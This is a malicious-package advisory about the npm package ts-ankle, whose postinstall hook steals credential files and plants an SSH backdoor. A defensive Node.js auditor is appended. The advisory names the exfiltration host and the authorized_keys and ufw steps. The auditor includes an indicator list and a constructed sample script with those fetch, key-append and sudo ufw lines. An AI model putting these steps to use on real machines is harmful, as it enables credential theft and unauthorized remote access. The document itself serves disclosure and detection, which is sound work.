
MAL-2026-6548

Malicious code in ts-ankle (npm)

Details


## Source: amazon-inspector (1695e2ffa9252abe1053fc13895a071bd87cb27eb009eeb2262aae1a27da4ea5)

On `npm install`, ts-ankle@1.1.0 runs a `postinstall` hook (`node test.js`) that executes two hostile flows against the installer's machine without user interaction.

1. Credential harvest: the script recursively walks the user's home directory on Unix and every mounted drive on Windows, collects files matching credential patterns (`.env`, `.json`, `.toml`, `.pem`, `id.json`, etc.), and POSTs them as multipart form uploads to `https://datasecure-service.vercel.app/api/v1`. The scan and block patterns are fetched at install time from `/api/scan-patterns` and `/api/block-patterns` on the same host, letting the operator dynamically retarget which files are exfiltrated.
2. SSH backdoor: the script fetches an SSH public key from `/api/ssh-key` and, on Linux, appends it to `~/.ssh/authorized_keys`, chowns the directory via `sudo`, and runs `sudo ufw enable` + `sudo ufw allow 22/tcp` to ensure inbound SSH is reachable — granting the operator persistent remote access to the installer's host.

The package's self-description as a backup/data-upload utility does not change the behavior: bulk credential-file harvest plus authorized_keys injection directed at a hardcoded author endpoint is supply-chain credential theft and remote backdoor installation.
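As an added defensive example (not code from the advisory, the reporting source, or the package), a Node.js check that flags npm lifecycle hooks in a package.json and scans the script a hook runs for the indicators named above; the package.json strings and hook-script text are constructed stand-ins containing only indicator strings, not the real payload.

```javascript
// Lifecycle hooks that npm runs automatically during `npm install`.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators taken from the MAL-2026-6548 advisory text above.
const INDICATORS = [
  { id: 'exfil-host', re: /datasecure-service\.vercel\.app/i, desc: 'hardcoded author-controlled endpoint' },
  { id: 'remote-patterns', re: /\/api\/(scan|block)-patterns\b/, desc: 'file-targeting patterns fetched at install time' },
  { id: 'ssh-key-fetch', re: /\/api\/ssh-key\b/, desc: 'SSH public key fetched from a remote host' },
  { id: 'authorized-keys', re: /authorized_keys/, desc: 'write to ~/.ssh/authorized_keys' },
  { id: 'firewall-open', re: /\bufw\s+(enable|allow)\b/, desc: 'firewall changed to expose a port' },
  { id: 'sudo', re: /\bsudo\b/, desc: 'sudo invoked from an install script' },
];

// Audit one package: `packageJsonText` is the package.json contents and
// `files` maps relative file names to their contents (an unpacked tarball).
function auditPackage(packageJsonText, files) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    // Any lifecycle hook is worth a look on its own, even if the script is missing.
    findings.push({ id: 'lifecycle-hook', hook, detail: cmd });
    // Resolve `node <file>` so the script the hook runs can be inspected.
    const m = /\bnode\s+(\S+)/.exec(cmd);
    const body = m && files[m[1].replace(/^\.\//, '')];
    if (!body) continue;
    for (const ind of INDICATORS) {
      if (ind.re.test(body)) findings.push({ id: ind.id, hook, detail: ind.desc });
    }
  }
  return findings;
}

// Constructed sample inputs (indicator strings only, not the real payload).
const MALICIOUS_PACKAGE_JSON =
  '{"name":"ts-ankle","version":"1.1.0","scripts":{"postinstall":"node test.js"}}';
const MALICIOUS_HOOK_SCRIPT = [
  "const host = 'https://datasecure-service.vercel.app';",
  "fetch(host + '/api/scan-patterns'); fetch(host + '/api/block-patterns');",
  "fetch(host + '/api/ssh-key').then(k => append('~/.ssh/authorized_keys', k));",
  "exec('sudo ufw enable'); exec('sudo ufw allow 22/tcp');",
].join('\n');
const BENIGN_PACKAGE_JSON =
  '{"name":"tidy-lib","version":"2.0.0","scripts":{"test":"node test.js","build":"tsc"}}';

console.log(auditPackage(MALICIOUS_PACKAGE_JSON, { 'test.js': MALICIOUS_HOOK_SCRIPT }));
console.log(auditPackage(BENIGN_PACKAGE_JSON, { 'test.js': "console.log('ok');" }));
```

The benign package also has a `test.js`, but because it is only wired to the `test` script and not to a lifecycle hook it is never executed by `npm install`, so it produces no findings.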


Affected packages

npm / ts-ankle
Introduced in: 0

No fixed version published yet for ts-ankle (npm). Pin to a known-safe version or switch to an alternative.
